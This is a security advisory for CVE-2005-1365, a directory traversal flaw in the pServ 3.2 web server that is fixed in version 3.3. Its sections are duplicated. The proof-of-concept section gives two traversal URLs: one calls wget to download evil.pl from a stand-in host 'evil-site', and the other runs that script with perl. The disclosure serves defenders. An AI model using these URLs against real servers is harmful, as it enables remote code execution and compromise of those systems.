Pserv Directory Traversal Vulnerability
BID:13642
Info
Pserv Directory Traversal Vulnerability
| Bugtraq ID: | 13642 |
| Class: | Design Error |
| CVE: |
CVE-2005-1365 |
| Remote: | Yes |
| Local: | No |
| Published: | May 16 2005 12:00AM |
| Updated: | Jul 12 2009 02:56PM |
| Credit: | Discovered by Claus R. F. Overbeck <[email protected]>. |
| Vulnerable: |
Pserv Pserv 3.2 |
| Not Vulnerable: |
Pserv Pserv 3.3 |
Discussion
Pserv Directory Traversal Vulnerability
pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.
This issue was reported to affect pServ version 3.2; earlier versions are like vulnerable.
pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.
This issue was reported to affect pServ version 3.2; earlier versions are like vulnerable.
Exploit / POC
Pserv Directory Traversal Vulnerability
An exploit is not required. The following proof of concept demonstration was supplied:
The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl
This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl
An exploit is not required. The following proof of concept demonstration was supplied:
The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl
This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl
Solution / Fix
Pserv Directory Traversal Vulnerability
Solution:
This issue was addressed in pServ 3.3:
Pserv Pserv 3.2
Solution:
This issue was addressed in pServ 3.3:
Pserv Pserv 3.2
-
pServ pserv-3.3.tar.gz
http://prdownloads.sourceforge.net/pserv/pserv-3.3.tar.gz?download
References
Pserv Directory Traversal Vulnerability
References:
References:
- Pserv Home Page (Pserv)
- Pico Server (pServ) Remote Command Injection ("Claus R. F. Overbeck"
)